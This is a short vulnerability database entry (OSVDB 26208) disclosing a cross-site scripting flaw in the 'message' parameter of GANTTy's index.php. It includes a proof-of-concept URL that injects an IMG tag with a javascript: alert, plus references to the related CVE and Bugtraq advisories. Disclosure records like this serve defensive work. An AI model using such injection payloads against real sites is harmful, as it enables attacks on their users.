GANTTy index.php message Variable XSS

2006-06-05T09:08:06
ID OSVDB:26208
Type osvdb
Reporter luny (luny@youfucktard.com)
Modified 2006-06-05T09:08:06

Description

Manual Testing Notes

http://[target]/index.php?action=login&message=<IMG SRC=javascript:alert('XSS')>+email&lang=

References:

Vendor URL: http://www.gantty.com/
Secunia Advisory ID: 20498
Related OSVDB ID: 26209
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-06/0014.html
CVE-2006-2892
Bugtraq ID: 18296